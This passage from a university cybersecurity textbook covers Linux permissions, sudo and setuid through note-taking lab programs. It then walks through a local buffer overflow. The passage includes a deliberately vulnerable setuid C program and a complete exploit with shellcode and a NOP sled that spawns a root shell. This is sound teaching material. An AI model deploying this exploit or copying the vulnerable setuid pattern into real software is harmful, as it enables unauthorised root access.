system has a unique user ID number, which you can determine by using the id command. For example, to determine the unique ID number for joe, we enter If we do this for all users we determine the following IDs: root mia joe instructor midshipman 0 500 501 998 999 211 There is a command that allows us to switch users… to switch from midshipman to, say joe. This command is the su command. Let’s try it! This command failed! The su command asks for the password of the target account (in this case, joe’s password). The only time a password will not be asked for is if the su command is entered by the root user! Hopefully you will agree that it makes sense to restrict this command to run without a password only for the system administrator! If we wanted to switch to the root user, we would type just su, but, again, this will ask for the root user’s password. Since executing commands as the root user is potentially very dangerous, Linux provides a more restricted version of the su command, called sudo. Using sudo allows us to execute a single command as the root user. After using sudo, the very next command will revert you back to the privileges of your account. 14 Since using sudo gives you root privileges (even for only a single command), a user is prompted for a password every time they use sudo. This should make sense, since if anyone could use the sudo command, then anyone can act as the root user, one command at a time. In a Linux system, the system administrator (root) may give a few trusted assistants sudo privileges. In order for you to explore privilege management, and get a fuller understanding of how permissions are managed behind the scenes, your textbook author (Jon Erickson) has set up your VMware software so that you, the user midshipman, can use the sudo command without a password. This will allow you to switch your identity to that of other users in order to see the system from their perspective. You must always keep in mind that this is not something that an ordinary user would ever be able to do. (http://xkcd.com) So… let’s use sudo to become the user joe! We enter: sudo su joe and see, I’m joe!15 3.2. The setuid Permission As joe, can I execute the program note1.exe? Looking at the permissions for this file from Section 3.1 above, the answer would seem to be "yes". Let's try to execute note1.exe: 14 The meaning of the acronym sudo is unclear. In some texts it is presented as "switch user (to root and) do". In some texts it is presented as "super user do". In some texts it is presented as "substitute user (for root and) do". Of course all texts are in agreement about what the sudo command actually does! 15 Although sudo only provides me the ability to execute one command as root, if the command is to switch to another user, you will remain as that user. In other words, you do not revert back to the former user after one command. 212 The program did not work. Looking back at the program at the start of Section 3.1, it looks like we invoked the if statement: if ( fd == -1 ) { printf( "\nFailed to open.\n"); } Although joe has permission to execute the program note1.exe, joe is not permitted to write to the file notes. Suppose we want joe to be able to execute the program note1.exe and actually make changes to the file named /tmp/notes, but we still do not want him to be able to read or write directly to the file /tmp/notes. In other words, we do not want joe to be able to write to the file by using, say, nano or some other program, but we do want him to be able to write to the file provided he only does this by using the note1.exe program. You may be surprised to know that this sort of scenario occurs quite frequently! Linux handles this by providing a special permission called the set user ID (setuid) permission. If an executable program has the setuid flag set, then whenever the program is executed, it will behave as though it were being executed by the owner. In other words, if we set the setuid flag for the file note1.exe, then when joe executes the program, the program will run as if the owner (midshipman) was executing it. This is good because the user named midshipman is the only one who can write to the file /tmp/notes . The owner, midshipman, can set the setuid flag for note1.exe . Let's switch back to the user named midshipman by typing exit, and then: chmod u+s note1.exe Let's do this and look at a listing of the file permissions: Note the s in the execute field for the owner. That is the indicator that the setuid flag is set. So… let’s go back to being joe and let’s see if joe can now add notes to /tmp/notes. We enter: sudo su joe then 213 Note that joe cannot directly read the file notes (see the permissions for /tmp/notes given in Section 3.1 above). The only way joe can have an effect on the file tmp/notes is through the use of the program note1.exe. If we exit, and look at the file as midshipman: It worked! Now joe—or anyone—can use the program (but only midshipman can read the file /tmp/notes). Practice Problem 9.8 You are viewing the access privileges of a file exam1.sh and they read: -r-xr-xr-- . (a) What privileges for this file are granted to the owner? (b) You give the command chmod g-x exam1.sh . What access privilege(s) did you change and to whom do they apply? Solution: (a) (b) Practice Problem 9.9 The following is the output of ls –l for the shutdown command, which is a system administration program. We can see that it is owned by the root user (administrator) and appears to be executable by everyone. That is, in actuality, not the case, since the program named shutdown actually calls other programs, and these other programs can only be executed by the root user. How can the root user modify the permissions to this program to allow anyone to shut down the computer? (Give the command, then an explanation of how it solves this problem.) Solution: Practice Problem 9.10 What does the sudo command accomplish? Solution: Practice Problem 9.11 Who can execute the sudo command? Solution: 214 Practice Problem 9.12 Consider the long listing for three files, shown below. The file note1.c is a C program that writes to the file /tmp/notes. The file note1.exe is the compiled version of note1.c. The system has four users: midshipman, smith, jones and, of course, root. (a) The user smith executes the file note1.exe and notices that his attempts to write to the file /tmp/notes are not successful. Explain why. Solution: (b) Suppose it was necessary to grant users the ability to write to the file /tmp/notes, but only when executing the program note1.exe. Your friend proposes two ways of accomplishing this: (i) Enter the command: chmod u+w /tmp/notes OR (ii) Enter the command: chmod u+s note1.exe Which option do you select and why? Solution: APPENDIX 16: More about the write command Let’s go back to that cryptic line of code: fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); and talk about the second argument to the open function fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); this second argument reads: O_RDWR|O_CREAT|O_APPEND The first item, O_RDWR tells the compiler that the program intends to read and write to the file stuff. fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); We have two other choices for this first flag: 16 If we only want the program to read a file (but never write to it): O_RDONLY If we only want a program to write to a file (but never read it): O_WRONLY Okay, let's end this chapter on an upbeat note: THIS APPENDIX IS NOT TESTABLE! 215 The second flag, O_CREAT , tells the compiler to create the file if it does not already exist. fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); The third flag, O_APPEND , tells the compiler to write data by appending it to the end of the file. fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); Our cryptic line of code should now make sense except for that last (third) argument: fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); Last but not least, let's discuss the third argument: fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); The third argument is used to set the file permissions. The choices to place in the third argument are: S_IRUSR S_IWUSR S_IXUSR The owner has permission to read the file The owner has permission to write to the file The owner has permission to execute the file S_IRGRP S_IWGRP S_IXGRP The owner’s group has permission to read the file The owner’s group has permission to write to the file The owner’s group has permission to execute the file S_IROTH S_IWOTH S_IXOTH Anyone has permission to read the file Anyone has permission to write to the file Anyone has permission to execute the file I could put as many of these choices in the third line as I choose, separating my choices with a vertical bar. What should be the result if I now entered: ls –l stuff 216 Problems 1. Navigate to the instructor directory. You should see the prompt: Using nano, open the file unix_basics for editing: midshipman@EC310:/home/instructor $ nano unix_basics Add your favorite Linux command (we realize you have several—just pick one) to the top of the file, and save the file under the same name (Control-o). Were you successful? Why/Why not? 2. Given the following declaration char school[20] = "US Naval Academy"; what value would be returned by each of the following function calls: 3. (a) strlen(school); (b) strlen("school"); Concerning the C programming language: (a) What feature of C makes a buffer overflow possible? Be specific! (b) Who (or what) is responsible for data integrity and memory management in C? (I.e., is it the responsibility of the compiler?) 4. Recall Problem 2 at the end of Chapter 6. The problem asked you to enter and compile the program below: void test_function( int a, int b, int c, int d, int e) { int flag; char buffer[ 10 ]; flag = 1234 buffer[ 0 ] buffer[ 1 ] buffer[ 2 ] ; = 'U' ; = 'S' ; = 'A' ; } int main( ) { test_function( 5, 6, 7, 8 , 9 ) ; } The Chapter 6 problem then asked you to analyze memory to determine where various arguments and variables were stored in memory. In this exercise we will repeat the problem, but by using just the assembly language. Additionally, you do not need to enter or recompile the program! You should answer all questions by only using the screen captures provided below. Consider the screen capture below, which was taken after pausing the program just before the function call (i.e., while still in main's stack frame): 217 (a) Sketch a picture of the stack frame for main. In your diagram, show where the base pointer and stack pointer are pointing to (label these as EBP-main and ESP-main), and show where the arguments to test function are stored in memory. I now continue running the program and pause just before the closing brace for the function named test_function (so I am in test_function's stack frame). Consider the screen shot shown below. (b) Based on the screen capture, add to your sketch by showing: the stack frame for test_function (label these EBP-test_function test_function). The location of flag (Hint: the base-10 value of 1234 is equivalent to 0x4d2) The location of buffer 218 and ESP (c) 5. Show, on your diagram, where the return address and the saved value of the base pointer are stored. From the assembly code snapshots given, determine the value of the stored return address and the value of the saved base pointer, and annotate these on your figure. After typing in the command, ls –l gethappy.exe you see: (a) Who is the owner of this file? (b) What permissions do other users in the owner’s group have? (c) You (midshipman) are neither the owner nor part of the owner’s group instructor. What command would the administrator enter to give you permission to read and execute the gethappy.exe file? 6. Continuing Problem 5 above: You (midshipman) now have permission to read and execute the gethappy.exe file. The function of the gethappy.exe file when executed is to write to the file happytimes. After multiple attempts, the executable file is not operating as expected. The owner changes the executable file. You see: (a) What permission changed? Your answer must include the name of the permission. (b) How does the change to the file’s permissions affect the execution of the file? 219 220 Security Exercise 9 Do you know who I am! Bonus points to the midshipman that can guess this target! Part I. Initial Set-up The program you will use today is named note2.c and this program has already been placed on your machine in the EC310code folder under your home directory. Copy this file to the work directory by carefully entering the following at the home directory prompt: midshipman@EC310:~ $ cp Make sure you are at your home directory! ec310code/note2.c work Enter this! Verify that you have note2.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls If you do not have note2.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2. Part II. A Truly Useful Program Before looking at the code, let's discuss the motivation for this program. Here is the scenario: You are the Company Commander for your Company. The intent of the program is to allow anyone in your Company (who, of course, all have Linux accounts) to send you a note. All the notes that are sent to you by company-mates will be written into the file /tmp/notes, one after another. The idea is that you can read all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by anyone else (in fact, they can’t even read their own notes once submitted). To make this more concrete, you might, at the start of the day, write a note (to yourself) that says Notes received today: Then, later in the morning, you might get a note from instructor that says: Nice job applying your Cyber2 skills in the Hall – keep it up.. Then, in the afternoon, your friend mia might send you a note that says: The wardroom fridge might be on the fritz again. In the evening, then, you could check the file named /tmp/notes and see all the notes that were left for you during the day. For this example, you would enter cat /temp/notes and see: Notes received today: Nice job applying your Cyber2 skills in the Hall – keep it up. The wardroom fridge might be on the fritz again. But your program is even better than this! Your program includes the user ID of everyone who adds a note! Recall that the user IDs for the users on your system are: root mia joe instructo midshipman 0 500 501 998 999 221 All right! Time to look at the code! 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24. 25. 26. 27. 28. 29. 30. 31. 32. 33. 34. #include<stdio.h> #include<stdlib.h> #include<string.h> #include<fcntl.h> #include<sys/stat.h> int main( int argc , char *argv[ ] ) { int fd ; int userid; char *buffer ; buffer = (char *)malloc(100); strcpy( buffer , argv[ 1 ] ); strncat( buffer , "\n" , 1 ); fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); userid = getuid( ) ; write( fd , &userid , 4 ); write( fd , "\n" , 1 ); write( fd , buffer , strnlen( buffer ) ); free( buffer ); close( fd ); } In the explanation that follows, let's presume that the executable file is named ./note2.exe (instead of ./a.out) and lets presume that the user named mia runs the program by entering ./note2.exe "What is for evening meal?" Notice that argv[1] is the string: "What is for evening meal?" Line 9 declares and integer named fd that will later hold the file descriptor for the file /tmp/notes. Line 11 declares an integer named userid that will later hold the user ID for the user entering a particular note. Lines 13 and 15 allocate space for 100 bytes on the heap to hold a string of 100 characters. The name of the string is buffer (so buffer points to the first character in the string). Line 17 copies argv[1] to buffer, so, in our example, buffer will now hold the string "What is for evening meal?" (followed by the NULL). Line 19 appends a newline character to buffer (and this occurs before the NULL), so, after line 19, buffer contains the string "What is for evening meal?\n" followed by the NULL. Line 21 assigned a file descriptor to the file named "/tmp/notes" and places the file descriptor in the integer variable named fd that was declared on line 9. From this point onward, whenever we wish to refer to the file "/tmp/notes" we will use the file descriptor fd. Line 23 contains a function we have not seen before: the function getuid( ). This function returns the ID of the user running the program. Recall that in our example, the user mia is running the program, so getuid( ) will return the value 500, which is mia's ID. 222 So, line 23: userid = getuid( ) ; will assign the value 500 to the integer variable userid which was declared on line 11. Up to this point in the program, information has been placed on the heap (in the string named buffer), but nothing yet has been written to the file /tmp/notes. Line 25 performs the first operation to write to the file, and notice that what is written is the user's ID followed by (on line 27) a new line character. Then, on line 29, we write the contents of buffer to the file. So, at this point, the file /tmp/notes contains: 500 What is for evening meal? Finally, line 31 frees space on the heap and line 33 closes the file. Now, suppose an hour later, user instructor (whose ID is 998) runs the program by entering: ./note2.exe "When is the next parade?" After instructor is done running the program, the file "/tmp/notes" contains: 500 What is for evening meal? 998 When is the next parade? So when you, the Company Commander, review the file at the end of the day, you can see all the notes left for you and, just as important, who it is that left each of the notes. Part III. Practice Running the Program Let's compile the program saving the machine language file under the name note2.exe by entering: gcc –g –o note2.exe note2.c Then add the first line to the file /tmp/notes by entering: ./note2.exe "Notes received today:" Examine the file /tmp/notes by entering: cat /tmp/notes Notice that your ID number is garbled! That is because you are attempting to print out the integer 999 (your ID number) as a character. We'll address this later. Now, check permissions for note2.exe and /tmp/notes by entering by entering: ls –l note2.exe /tmp/notes You should see: Question 1: Who owns the file note2.exe ? Question 2: List all of the users who are able to write to the file named /tmp/notes. 223 You tell all of your company-mates that they have execute permission for the file note2.exe, and that they are to start sending you messages during the day, and you will review their messages and reply each evening. The first evening arrives, you look at the file /tmp/notes and you see only your message (Notes received today:). Your company-mates mia and joe insist that they sent you messages during the day. Hmm…it seems that messages left by other individuals are not being saved, even though everyone has permission to execute the program note2.exe. Question 3: Why are other users not experiencing success with this program? Question 4: What command should you enter to remedy the problem you noted in Question 3? (Do it!) (Hint: if you answered Question 4 correctly, then, upon entering ls –l note2.exe you should see Now, let's see how the program would look from mia's perspective. First, switch to user mia by entering sudo su mia Now, the prompt should indicate that you are the user named mia. Cool - You're mia!!! Now, noticing that you are mia, run the program by entering: ./note2.exe "A message from Mia." Now, as mia, examine the file /tmp/notes by typing: cat /tmp/notes Question 5: Was mia successful in looking at the file /tmp/notes? Why/Why not? Switch back to being the user named midshipman by entering exit Now, examine the file /tmp/notes by typing: cat /tmp/notes Question 6: Was the message from mia saved in the file? Question 7: Is the following statement true or false: Only the user named midshipman can freely read from or write to the file named /tmp/notes. Other users are permitted to write to the file, but only in a very restricted sense: via the use of the program note2.exe. 224 Enter the command ls –l /tmp/notes Your friend sees the result and says: I see that only the file's owner, midshipman, is able to read or write to the file. But we just saw that mia was able to write to the file? How is that possible? Question 8: How would you answer your friend's question? Part IV. Autopsy of the File Named /tmp/notes First, let's delete the file current file named /tmp/notes so that we can start fresh. rm /tmp/notes Recall that rm stands for "remove." Verify that the file has been removed by typing: cat /tmp/notes You should see the message: No such file or directory From your work directory, carefully enter the following at the command prompt: cp ../ec310code/notes /tmp Now, recall that you are the user midshipman. Not just any midshipman. The Company Commander! You are very proud of having reached this position. Your people love you. You check the messages left by your company-mates by typing cat /tmp/notes and you see: ARGGHH! You want to have a talk with the midshipman who sent you the next-to-last note. Was it your friend Mia? Or, perhaps it was Joe? We need to find out who it is! That midshipman needs to be counseled on respectful communication and constructive feedback! Haven’t we learned anything in this leadership laboratory?! In Part III above we mentioned that the ID numbers are garbled. But we can look at the file in hexadecimal. Enter: hexdump –C /tmp/notes 225 You should see this: Examining the hexdump of the file /tmp/notes , our goal is to determine who left the note You suck – worst CC EVER. For convenience, the ASCII table is presented below. Let’s go to the top of the hex dump. We know that the first text we have is: Notes received today: 226 Let’s focus just on the capital N and small o (i.e., the first two letters of Notes received today) Question 9: Determine how the text No would be stored in memory in hexadecimal notation. Locate these values (from Question 9) in the hex code display. Question 10: According to the ASCII table, what is the meaning of the byte that immediately precedes No in the hexdump? Question 11: The first four bytes in the hex dump are e7 03 00 00. Since, for every note that is entered, the user id number of the note writer, a new line, and the actual note are written to the /tmp/notes file, what is the significance of these first four bytes? Question 12. Since the first four bytes are stored in little-endian order, rewrite these four bytes in their actual order. Question 13. Convert your answer to Question 12 to a decimal integer. Question 14. What is the significance of this value? (Hint, look at the top of the first page of this Security Exercise.) Question 15. Use all your sleuthing abilities to find the hexadecimal value associated with the unpleasant person who left the note You suck – worst CC EVER. What is the hex value of the user id number of the person who left this note? Question 16. Convert your answer for Question 15 to a decimal value. Question 17. Who gets fried? 227 228 Security Exercise 9 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: Question 11: Question 12: Question 13: Question 14: Question 15: Question 16: Question 17: 229 230 Chapter 10: A Real Buffer Overflow Objectives: (a) Describe how a buffer overflow attack can be used to gain root access to a computer. (b) Describe two techniques that a hacker can use to make it simpler to craft a buffer overflow. (c) Describe technical solutions that have been proposed to prevent a program from being exploited by a buffer overflow. 1. Note-Taking and Note-Searching Programs 1.1. Review of Security Exercise 9 Last time in lab you looked at a fascinating program (named note2.c) that takes a scintillating text string as a command line argument, and then appends the scintillating text string to the end of the fabulous file with pathname /tmp/notes. The program also appends—to the very front of a note—the user ID of anyone who adds a note. You use this program in your capacity as Company Commander: anyone in your Company can send you a note. The idea is that you can read all the notes that midshipmen in your Company send you, but the midshipmen cannot read the notes sent by anyone else (and can’t even read their own notes once submitted). By examining the user ID, you can identify all the “anonymous” (ha, ha) note senders. The program is repeated below. #include<stdio.h> #include<stdlib.h> #include<string.h> #include<fcntl.h> #include<sys/stat.h> int main( int argc , char *argv[ ] ) { int fd ; int userid ; char *buffer ; buffer = (char *)malloc(100); strcpy( buffer , argv[ 1 ] ); strncat( buffer , "\n" , 1 ); fd = open( "/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR ); userid = getuid( ) ; write( fd , &userid , 4 ); write( fd , “\n” , 1 ); write( fd , buffer , strnlen( buffer ) ); free( buffer ); close( fd ); } Recall that when you first wrote this program, your company mates could not start immediately sending you notes. You first had to grant setuid permission by entering: chmod u+s note2.exe. After that, anyone could run the program, and the program would then execute as though executed by the owner. The file tmp/notes that you looked at in the last lab was built as follows: First you (midshipman) entered: Notes received today: Then instructor entered: The wardroom fridge might be on the fritz again. Then matrix entered: Thanks for the notes. Then joe entered: You suck – worst CC EVER. Then matrix entered: Great spirit spot-BZ. 231 And you saw all that you had made, and it was very good. And there was evening, and there was morning—the ninth EC310 chapter. 1.2. A New Program The program note2.c is actually practical and useful. But it would be nice for a user to be able to explore the file /tmp/notes to see the notes that they had entered. Of course they should not be able to view the notes that were written by anyone else. For example, given the notes entered as shown above, if joe were to execute this hypothetical program, he would see: and if matrix runs the program she would see: Moreover, it would be nice if the program had one additional feature. It would be nice if the user could run the program with the option of specifying an additional command line argument. This command line argument would be a string, and the improved program would only return the user's comments containing that string. The following screen capture should illustrate how we would like the improved program to run. Presented below is a program, which we will name bettersearchnote.c , that does precisely this. This program is, quite obviously, the longest program you have seen (or will see!) in EC310. This program is powerful and complex. Our goal is that you understand the program in general terms. We present the program all at once below, but in the following pages we will describe the operation of each of its functions one-by-one. So… hang on! #include<stdio.h> #include<string.h> #include<fcntl.h> #include<sys/stat.h> int find_user_note( int fd , int user_uid ) { int note_uid = -1 ; unsigned char byte ; int length; while( note_uid != user_uid ) { if( read( fd , &note_uid , 4 ) != 4 ) return -1 ; if( read( fd , &byte , 1 ) != 1 ) return -1 ; byte = 0; length = 0; 232 while( byte != '\n' ) { if( read( fd , &byte , 1 ) != 1 ) return -1; length = length + 1 ; } } lseek( fd , length * -1 , SEEK_CUR ); return length ; } int print_notes( int fd , int uid , char * searchstring ) { int note_length ; char byte = 0 ; char note_buffer[ 100 ] ; note_length = find_user_note( fd , uid ); if( note_length == -1 ) return 0; read( fd , note_buffer , note_length ) ; note_buffer[ note_length ] = 0 ; if( search_note( note_buffer , searchstring ) printf( note_buffer ); return 1; } int search_note( char *note { int i; int keyword_length ; int match = 0; , char *keyword ) keyword_length = strlen( keyword ); if( keyword_length == 0 ) return 1; for( { i = 0 if( ; i < strlen( note ) ; i = i + 1 ) note[i] == keyword[ match ] ) match = match + 1 ; else { if( note[ i ] == keyword[ 0 ] ) match = 1 ; else match = 0 ; } if ( match == keyword_length ) return 1; } return 0; 233 ) } int main( int argc , char *argv[ ] ) { int user_id; int fd; This innocent looking line of code is a potential buffer overflow! Do you see why? int printing = 1; char searchstring[ 100 ] ; if( argc > 1 ) strcpy( searchstring , argv[ 1 ] ) ; else searchstring[ 0 ] = 0 ; user_id = getuid( ); fd = open( "/tmp/notes" , O_RDONLY ); while( printing ) printing = print_notes( fd , user_id , searchstring ); close( fd ); } So, notice that we have four functions: find_user_note , print_notes , search_note and main . We'll start (as all programs start) with the main function. The main function 1. int main( int argc , char *argv[ ] ) 2. { 3. int user_id; 4. int fd; 5. int printing = 1; 6. char searchstring[ 100 ] ; 7. if( argc > 1 ) 8. strcpy( searchstring , argv[ 1 ] ) ; 9. else 10. searchstring[ 0 ] = 0 ; 11. user_id = getuid( ); 12. fd = open( "/tmp/notes" , O_RDONLY ); 13. 14. while( printing ) printing = print_notes( fd , user_id , searchstring ); 15. 16. } close( fd ); Four variables are declared in main. First, the integer user_id is declared in line 3. In line 11, this variable is assigned the ID of the person running the program. So, for example, if joe is running the program, then user_id will be assigned the value 501. Next, the integer fd is declared in line 4. This variable will hold the file descriptor for the file /tmp/notes. The variable fd is tied to the file /tmp/notes in line 12. Third, the string named searchstring , declared in line 6, will hold the optional command line argument. If argc is greater than 1 then the user did enter the optional argument, and this command line argument is placed in searchstring in line 8. If the user did not enter the optional command line argument, then zero is placed in searchstring. 234 The variable printing is initially assigned the value of 1 in line 5. 1, so we will always enter the body of the while loop. (Note that in C, if a Boolean expression evaluates to an integer other than zero, the Boolean expression is interpreted as true.) This while loop calls the function named print_notes. We will look at the function print_notes in a moment, but for now, accept on faith that the function print_notes will look for a note from this user_id containing the searchstring, and if successful, will print out the note to the monitor and then will return the value 1. If the value 1 is returned by print_notes, the while loop (line 13) will iterate again. That will call the function print_notes again, and the function will look further into the file /tmp/notes (picking up where it left off) and again search for a note from this user_id containing the searchstring. The function print_notes will keep setting printing to 1 so long as the user with ID equal to user_id still has notes in the file /tmp/notes. Eventually, there will be no more notes in the file /tmp/notes from this user_id containing the desired searchstring, and, at that point, the function print_notes will return a 0. That ends the while loop's iteration and ends the program. The print_notes function 1. 2. 3. 4. 5. Let's now turn our attention to the function print_notes. int print_notes( int fd , int uid , char * searchstring ) { int note_length ; char byte = 0 ; char note_buffer[ 100 ] ; 6. note_length = find_user_note( 7. 8 if( note_length == -1 ) return 0; 9. read( fd , note_buffer , note_length ) ; 10. note_buffer[ note_length ] = 0 ; 11. 12. if( 13. 14. fd , uid ); search_note( note_buffer , searchstring ) printf( note_buffer ); ) return 1; } The integer variable note_length is declared on line 3. On line 6, the function named find_user_note is called, and the return value from this function is placed in note_length. For now, accept on faith that the function find_user_note returns the length of the next note in the file /tmp/notes that was put there by the user with ID equal to user_id . If the function finds no such note, it returns -1. So, at line 7, the variable note_length will contain either the number of bytes that were in a note left by the user running the program, or will contain the value of -1 if no such note was found. If note_length does equal -1, then zero will be returned to main on line 8, ending the iteration of the while loop in main. The read function moves sequentially through a file without backing up. In other words, the read function starts reading from a file precisely where the last read function left off. In line 5, a string named note_buffer is declared, and on line 9, we read from the file a number of bytes equal to note_length into the string note_buffer. The practical effect is that note_buffer now contains the next string that was in the file /tmp/notes left by the user running the program. We then, in line 10, terminate the string with a NULL. In line 11, we call the function named search_note giving the function as inputs note_buffer (which contains a string left by this particular user found in the file /tmp/notes) and the string searchstring (which contains the characters that the user entered as argv[1] ). If the desired searchstring is found within the string note_buffer, the function search_note will return 1 and the contents of note_buffer will be printed to the monitor on line 12. This ensures that we only print out notes from the user running the program if they contain the desired search string. 235 The find_user_note function 1. 2. 3. 4. 5. int find_user_note( int fd , int user_uid ) { int note_uid = -1 ; unsigned char byte ; int length; 6. 7. 8. 9. while( note_uid != user_uid ) { if( read( fd , &note_uid , 4 ) != 4 ) return -1 ; 10. 11. if( 12. 13. byte = 0; length = 0; 14. 15. 16. 17. while( byte != '\n' ) { if( read( fd , &byte , 1 ) != 1 ) return -1; 18. 19. 20. } } 21. lseek( fd , length * -1 , SEEK_CUR ); 22. 23. read( fd , &byte , 1 ) != 1 ) return -1 ; length = length + 1 ; return length ; } The function find_user_note searches through the file with descriptor fd, searching for a note from the user with ID equal to user_uid. If it finds such a note, it returns the length of that note. The integer note_uid is declared in line 3 and initialized to -1. Recall that when users run the Company Commander's program to leave notes in the file /tmp/notes, their user ID is recorded before their note. The intent is that note_uid will hold the user ID of the note being examined. Since the user ID cannot be equal to -1, the while loop on line 6 always iterates at least once. The if statement on lines 8-9 reads the user ID from the file /tmp/notes and places this value in note_uid. If we cannot succeed in reading in the user ID, we must be at the end of the file, and we return a value of -1 on line 9. The if statement on lines 10-11 reads past newline character which always follows the user ID in the file /tmp/notes. Thus, at the start of line 14, note_uid contains the user ID of the note that is about to be read from the file, and the read function is positioned at the first character in this note. The while loop on lines 14-20 simply reads through the file, byte-by-byte, counting the total number of characters read before a newline is encountered. The variable length, initialized to zero on line 13, keeps track of this running sum. When we reach a new line character, the while loop on line 14 stops iterating, and length contains the length of the note left by the user with ID equal to note_uid. We then return to line 6, and examine the Boolean expression governing this while loop. If the ID of the user whose note was just extracted from the file ( note_uid ) is not equal to the note of the person running the program ( user_uid ), then this note that was just extracted is of no interest to us. We simply execute the while loop on lines 6-20 all over again, placing the ID of the next note in note_uid and counting up the characters in this next note. On the other hand if, upon returning to line 6 and examining the Boolean expression governing this while loop, we find that the ID of the user whose note was just extracted from the file ( note_uid ) is equal to the note of the person running the 236 program ( user_uid ), then we have indeed found a note left by the person running the program. In this case, we exit the line 6 while loop and jump to line 21. At the start of line 21, we have found a note from the individual running the program, and we know the length of this user's note. But, unfortunately, in determining the length of the user's note we have read past the end of the user's note in the file /tmp/notes. So, in line 21, we reset the read function so that we are back at the start of this user's note. We do this by backing up –length characters. After line 21, the next call to read will start reading the file /tmp/notes at the start of the note of the user whose ID is in user_uid. The search_note function The search_note function takes two arguments: a string containing a note left by the user running the program, and the searchstring that was entered by the user as a command line argument. If the searchstring is found anywhere within the note left by the user, the program returns a value of 1. If the searchstring is not found within the user's note, the function returns a value of 0. You should be able to navigate through this function given the skills you have developed to date. The gory details of the function are left as an exercise. At this point, we’ll break for the Security Exercise. Let's jump to Security Exercise 10! After the Security Exercise is done, we’ll return to your regularly scheduled lecture. 2. You've Been Hacked! Back in Chapter 7, we noted that the very first major attack on DoD computer networks took place in February of 1998 and lasted for over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been used countless times ever since. You have just witnessed this buffer overflow in your lab! Recall that the buffer overflow entails overwriting a buffer in such a way that an executable program is placed in the stack memory. Earlier in the course, we looked at a buffer overflow in general terms. In that earlier example, recalled in the picture shown below, a buffer named alpha_code has been overwritten with an executable program that extends beyond the buffer allotted for alpha_code. The idea behind the illustration above is that we can overwrite additional stack items, including the return address, which is stored on the stack. The key for the exploit to work is that the return address must be set to the address of alpha_code! If 237 we manage to set the return address to the address of alpha_code, then the return address is the address of the start of the executable program. Then, when the function is done executing, the return address will be retrieved and the executable code that the adversary placed on the stack will start executing. Again, the exploit involves the adversary placing his own program in memory and making it execute. The program exploit_notesearch.c that you examined in lab simply generates a command string that runs the bettersearchnote.exe program. The function named system will simply run its argument. So the function call system(command); will act as though the user typed in whatever is held the string named command, and then hit return. #include <stdio.h> #include <stdlib.h> #include <string.h> char shellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" "\xe1\xcd\x80"; int main(int argc, char *argv[]) { unsigned int i, *ptr, ret, offset=270; char *command, *buffer; This program will be explained in detail by a separate PowerPoint presentation. command = (char *) malloc(200); bzero(command, 200); // zero out the new memory strcpy(command, "./bettersearchnote.exe \'"); // start command buffer buffer = command + strlen(command); // set buffer at the end if(argc > 1) // set offset offset = atoi(argv[1]); ret = (unsigned int) &i - offset; // set return address for(i=0; i < 160; i+=4) // fill buffer with return address *((unsigned int *)(buffer+i)) = ret; memset(buffer, 0x90, 60); // build NOP sled memcpy(buffer+60, shellcode, sizeof(shellcode)-1); strcat(command, "\'"); system(command); // run exploit free(command); } Now, the string named shellcode contains machine language instructions to open a shell prompt. This program executes ./bettersearchnote.exe and causes a buffer overflow that overwrites the return address, pointing to the machine instructions contained in shell code. These instructions will open a shell. So… what’s the big deal you might ask? The problem is that when a user (any old user) executes bettersearchnote.exe they are running the program as root because the suid flag is set. So… with the program running with elevated privileges, whose shell is opened? The answer: root’s 238 So, armed with a root shell, the hacker now has: full control of the system the ability to read anyone’s files the ability to delete anyone’s files the ability to install any software… including malware. 3. How is a Buffer Overflow Performed? So...how would you perform a buffer overflow? You would first attempt to see if this C flaw exists by entering a ridiculously long value (but one that you know) when prompted to enter something, and you would check to see if that causes the program to behave erratically or crash with a segmentation fault. This is an example of a technique known as “fuzz testing” or “fuzzing”. In general, fuzzing is the attempt to find soft spots in a program. If successful, you then can analyze the hex dump to see where your input string resides. You then use this info, plus the source code (usually available for UNIX) to attempt to find where the return address is stored. Crafting a buffer overflow attack is not easy. Hackers use two clever techniques to make the process a little more manageable. Calling the contents inserted into the buffer the “payload”, we can say that the payload has three sections: The desired return address is repeated many times at the end of the payload. Why the repetition? This gives the hacker a number of chances to get the address correctly positioned in the return address field. The executable program (the exploit) A series of NOP instructions (assembly language “no operation” instructions). This series of NOPs is called the “NOP sled”. Why the NOP sled? It lets the hacker be a little bit off with the return address. The return address just has to point anywhere within the NOP sled. Otherwise the return address would need to be the precise first address of the exploit. 4. Defenses Against the Buffer Overflow Attack How can we prevent a process from being exploited by a buffer overflow? We mentioned one technique that would surely work: We could add code to the compiler to check the bounds on each and every array reference (i.e., we can make the compiler responsible for ensuring data integrity). But this would significantly slow down all programs, and so is not a solution at all—it would be akin to preventing injuries in automobile accidents by imposing a national 5 MPH speed limit. We can certainly minimize buffer overflow exploits by very careful coding. In the words of a former member of the NSA's elite hacker unit (the Tailored Access Operations Division) the solution is straightforward: "The bottom line for preventing buffer overflows is to ensure that bounds are checked before stuffing a string into an array or 